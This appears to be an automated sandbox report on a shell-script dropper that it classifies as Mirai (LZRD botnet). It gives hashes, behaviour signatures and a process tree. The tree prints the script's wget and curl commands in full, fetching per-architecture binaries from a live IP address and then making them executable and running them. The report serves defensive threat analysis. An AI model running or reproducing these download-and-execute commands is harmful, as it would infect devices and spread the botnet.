Overview

overview

10

Static

static

1

ohshit.sh

ubuntu-18.04-amd64

10

ohshit.sh

debian-9-armhf

10

ohshit.sh

debian-9-mips

10

ohshit.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    143s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    02/12/2024, 00:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ohshit.sh

  • Size

    3KB

  • MD5

    88738a95929e9c44969bcffde3c50f4b

  • SHA1

    5b9581fadd1ea4b8621d5b0adb559a631b1226ee

  • SHA256

    1b6a6ceb23e46cf0a36bb0f1fc89472f3ec42ea1b23ca15ffe49c39f8d9ea0f4

  • SHA512

    df40b12ad937df1d3a36673761fe27b5c2072f1f871f37610e76987411c292f75b70035258ebf6f912d4f856ad014c0d67d461e87e71b939e127179c5bd985f9

Score
10/10
mirailzrdbotnetdefense_evasiondiscoveryupx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • File and Directory Permissions Modification 1 TTPs 15 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 15 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 2 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 30 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Writes file to tmp directory
    PID:706
    • /bin/cp
      cp /bin/busybox /tmp/
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:712
    • /usr/bin/wget
      wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arc
      2⤵
      • Writes file to tmp directory
      PID:715
    • /usr/bin/curl
      curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:722
    • /bin/cat
      cat ub8ehJSePAfc9FYqZIT6.arc
      2⤵
        PID:736
      • /bin/chmod
        chmod +x Abyss busybox ohshit.sh systemd-private-9ea5bc960d0a4062ac64e2e86dbfbbc9-systemd-timedated.service-xR9Dod ub8ehJSePAfc9FYqZIT6.arc
        2⤵
        • File and Directory Permissions Modification
        PID:737
      • /tmp/Abyss
        ./Abyss
        2⤵
        • Executes dropped EXE
        PID:738
      • /usr/bin/wget
        wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.x86
        2⤵
        • Writes file to tmp directory
        PID:740
      • /usr/bin/curl
        curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.x86
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:741
      • /bin/cat
        cat ub8ehJSePAfc9FYqZIT6.x86
        2⤵
          PID:744
        • /bin/chmod
          chmod +x Abyss busybox ohshit.sh systemd-private-9ea5bc960d0a4062ac64e2e86dbfbbc9-systemd-timedated.service-xR9Dod ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86
          2⤵
          • File and Directory Permissions Modification
          PID:745
        • /tmp/Abyss
          ./Abyss
          2⤵
          • Executes dropped EXE
          PID:746
        • /usr/bin/wget
          wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.x86_64
          2⤵
          • Writes file to tmp directory
          PID:749
        • /usr/bin/curl
          curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.x86_64
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:760
        • /bin/cat
          cat ub8ehJSePAfc9FYqZIT6.x86_64
          2⤵
            PID:775
          • /bin/chmod
            chmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
            2⤵
            • File and Directory Permissions Modification
            PID:776
          • /tmp/Abyss
            ./Abyss
            2⤵
            • Executes dropped EXE
            PID:777
          • /usr/bin/wget
            wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.i686
            2⤵
            • Writes file to tmp directory
            PID:781
          • /usr/bin/curl
            curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.i686
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:791
          • /bin/cat
            cat ub8ehJSePAfc9FYqZIT6.i686
            2⤵
              PID:801
            • /bin/chmod
              chmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
              2⤵
              • File and Directory Permissions Modification
              PID:802
            • /tmp/Abyss
              ./Abyss
              2⤵
              • Executes dropped EXE
              PID:803
            • /usr/bin/wget
              wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mips
              2⤵
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:806
            • /usr/bin/curl
              curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mips
              2⤵
              • Reads runtime system information
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:807
            • /bin/cat
              cat ub8ehJSePAfc9FYqZIT6.mips
              2⤵
              • System Network Configuration Discovery
              PID:808
            • /bin/chmod
              chmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
              2⤵
              • File and Directory Permissions Modification
              PID:809
            • /tmp/Abyss
              ./Abyss
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Writes file to system bin folder
              • Reads runtime system information
              PID:810
            • /usr/bin/wget
              wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mips64
              2⤵
              • System Network Configuration Discovery
              PID:814
            • /usr/bin/curl
              curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mips64
              2⤵
              • Reads runtime system information
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:815
            • /bin/cat
              cat ub8ehJSePAfc9FYqZIT6.mips64
              2⤵
              • System Network Configuration Discovery
              PID:816
            • /bin/chmod
              chmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
              2⤵
              • File and Directory Permissions Modification
              PID:817
            • /tmp/Abyss
              ./Abyss
              2⤵
              • Executes dropped EXE
              PID:818
            • /usr/bin/wget
              wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mpsl
              2⤵
              • Writes file to tmp directory
              PID:819
            • /usr/bin/curl
              curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mpsl
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:820
            • /bin/cat
              cat ub8ehJSePAfc9FYqZIT6.mpsl
              2⤵
                PID:827
              • /bin/chmod
                chmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
                2⤵
                • File and Directory Permissions Modification
                PID:828
              • /tmp/Abyss
                ./Abyss
                2⤵
                • Executes dropped EXE
                PID:829
              • /usr/bin/wget
                wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm
                2⤵
                • Writes file to tmp directory
                PID:833
              • /usr/bin/curl
                curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:839
              • /bin/cat
                cat ub8ehJSePAfc9FYqZIT6.arm
                2⤵
                  PID:847
                • /bin/chmod
                  chmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
                  2⤵
                  • File and Directory Permissions Modification
                  PID:848
                • /tmp/Abyss
                  ./Abyss
                  2⤵
                  • Executes dropped EXE
                  PID:850
                • /usr/bin/wget
                  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm5
                  2⤵
                  • Writes file to tmp directory
                  PID:853
                • /usr/bin/curl
                  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm5
                  2⤵
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:858
                • /bin/cat
                  cat ub8ehJSePAfc9FYqZIT6.arm5
                  2⤵
                    PID:863
                  • /bin/chmod
                    chmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
                    2⤵
                    • File and Directory Permissions Modification
                    PID:864
                  • /tmp/Abyss
                    ./Abyss
                    2⤵
                    • Executes dropped EXE
                    PID:865
                  • /usr/bin/wget
                    wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm6
                    2⤵
                    • Writes file to tmp directory
                    PID:867
                  • /usr/bin/curl
                    curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm6
                    2⤵
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:868
                  • /bin/cat
                    cat ub8ehJSePAfc9FYqZIT6.arm6
                    2⤵
                      PID:869
                    • /bin/chmod
                      chmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
                      2⤵
                      • File and Directory Permissions Modification
                      PID:870
                    • /tmp/Abyss
                      ./Abyss
                      2⤵
                      • Executes dropped EXE
                      PID:871
                    • /usr/bin/wget
                      wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm7
                      2⤵
                      • Writes file to tmp directory
                      PID:873
                    • /usr/bin/curl
                      curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm7
                      2⤵
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:874
                    • /bin/cat
                      cat ub8ehJSePAfc9FYqZIT6.arm7
                      2⤵
                        PID:875
                      • /bin/chmod
                        chmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
                        2⤵
                        • File and Directory Permissions Modification
                        PID:876
                      • /tmp/Abyss
                        ./Abyss
                        2⤵
                        • Executes dropped EXE
                        PID:877
                      • /usr/bin/wget
                        wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.ppc
                        2⤵
                        • Writes file to tmp directory
                        PID:879
                      • /usr/bin/curl
                        curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.ppc
                        2⤵
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:880
                      • /bin/cat
                        cat ub8ehJSePAfc9FYqZIT6.ppc
                        2⤵
                          PID:881
                        • /bin/chmod
                          chmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
                          2⤵
                          • File and Directory Permissions Modification
                          PID:882
                        • /tmp/Abyss
                          ./Abyss
                          2⤵
                          • Executes dropped EXE
                          PID:883
                        • /usr/bin/wget
                          wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.sparc
                          2⤵
                            PID:885
                          • /usr/bin/curl
                            curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.sparc
                            2⤵
                            • Reads runtime system information
                            • Writes file to tmp directory
                            PID:886
                          • /bin/cat
                            cat ub8ehJSePAfc9FYqZIT6.sparc
                            2⤵
                              PID:887
                            • /bin/chmod
                              chmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
                              2⤵
                              • File and Directory Permissions Modification
                              PID:888
                            • /tmp/Abyss
                              ./Abyss
                              2⤵
                              • Executes dropped EXE
                              PID:889
                            • /usr/bin/wget
                              wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.m68k
                              2⤵
                              • Writes file to tmp directory
                              PID:890
                            • /usr/bin/curl
                              curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.m68k
                              2⤵
                              • Reads runtime system information
                              • Writes file to tmp directory
                              PID:891
                            • /bin/cat
                              cat ub8ehJSePAfc9FYqZIT6.m68k
                              2⤵
                                PID:892
                              • /bin/chmod
                                chmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
                                2⤵
                                • File and Directory Permissions Modification
                                PID:893
                              • /tmp/Abyss
                                ./Abyss
                                2⤵
                                • Executes dropped EXE
                                PID:894
                              • /usr/bin/wget
                                wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.sh4
                                2⤵
                                • Writes file to tmp directory
                                PID:896
                              • /usr/bin/curl
                                curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.sh4
                                2⤵
                                • Reads runtime system information
                                • Writes file to tmp directory
                                PID:897
                              • /bin/cat
                                cat ub8ehJSePAfc9FYqZIT6.sh4
                                2⤵
                                  PID:898
                                • /bin/chmod
                                  chmod +x Abyss busybox ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:899
                                • /tmp/Abyss
                                  ./Abyss
                                  2⤵
                                  • Executes dropped EXE
                                  PID:900

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • /tmp/Abyss
                                Filesize

                                23KB

                                MD5

                                7fc3afdda7fbf993f43067a26cafed89

                                SHA1

                                4a422cc19b5c6ab0228cc94e3c0268cc54f720e3

                                SHA256

                                e68832c656e933eea0904858518a31956bece42fc31b9ee9a8114331265ea93f

                                SHA512

                                be1b011eccaa7c2dcac72c1c15805d00b864623f2e6466e48077720afc6601ff762530e0be201e58eb89ac0c479e9a87631bd123eb4d311f6ea7c4e2827c1dc6

                                Download Submit

                              • /tmp/Abyss
                                Filesize

                                22KB

                                MD5

                                fabfa526cad5319365ea6653e6f9ced8

                                SHA1

                                136bc476e87c8abd1139876951b2f9d7d5987bac

                                SHA256

                                1d527eb33d504aa5f19fc15da542a1e6911bc07d751ab4570ba49b159569681f

                                SHA512

                                3aaae3ebc9f2c1e28eda4a8857f051f76666657436a77bbd13e3c2cc60bf2f9f3b5ecca984c84e6f43acc5fd14a0827c16926d55c52f4ca7df764a790cc065a0

                                Download Submit

                              • /tmp/Abyss
                                Filesize

                                22KB

                                MD5

                                e848aed4b617d3fb33d79bce6fbaa4c8

                                SHA1

                                d000abf3da046f81749c2c79338c1cdc51ca3831

                                SHA256

                                92f53ef0e5773a17e4d42f3ebe2d5a81269a59815ffd2cf7885051a28a7d8565

                                SHA512

                                03d449908c04c08039f44db3f0b644b2582a87a64785a78b854f3605a0e640aa1b239891716270c566f9de8897c127fcc1bed8df85c80079070384d9e24623ba

                                Download Submit

                              • /tmp/Abyss
                                Filesize

                                27KB

                                MD5

                                f43afab6ef81a2d16e324d4fe443ce68

                                SHA1

                                21fa1cb8e027e3b00dcf6e7eda11108dab8383d6

                                SHA256

                                6a27b0ad9aafa3dfe2757bfdbbfbc9f8c3a096167fe8754a82066db12081b395

                                SHA512

                                352120f50e0771b84fd205f8d72b921161b2abdade2c4d831cbcaf90b19256ed26f465d3535408e35f210e57fbc8adf78a82c171a45ae2129fc8b5828bc12389

                                Download Submit

                              • /tmp/Abyss
                                Filesize

                                71KB

                                MD5

                                bfc7e472b8b0c8e43bd9afd78025f73b

                                SHA1

                                3c0d2a9c138cc4e2af2c5f00560fa95597f74d78

                                SHA256

                                6654b606a7c6ccfa8635bd98709957fbd36def5abad3122282864e4bf4e2a095

                                SHA512

                                76e4e3de635d92cc4f5c5dd7654a7324ba3440fff42ceec2fb883654f6a1da31f729a809a08a11e67ee82bd1b50eb592f9b6b6e1a59ba2605ded7b6dffd3fd52

                                Download Submit

                              • /tmp/busybox
                                Filesize

                                857KB

                                MD5

                                a39fe8036e559ce804e26518061e59ff

                                SHA1

                                8df27f6e8a48b762d945ea2f2b87390c80acd4de

                                SHA256

                                3180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38

                                SHA512

                                e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d

                                Download Submit

                              • /tmp/ub8ehJSePAfc9FYqZIT6.arc
                                Filesize

                                105KB

                                MD5

                                39984021963a3aa917b249460dd4ede1

                                SHA1

                                d2637e855e891be1bd4c577682c2750352f21d8f

                                SHA256

                                418c17efde9207470ca3fc2938947846419f95abf0c48e811a9c433bd93ef95d

                                SHA512

                                4580ac52c4844114e59a6680fb1ca8928cfa0593fc069681245a5cc97efc84bba373a3e0d8eaf280adb33e7bdd1c61b99eedc0f66dccbfa64b17051bf75b1263

                                Download Submit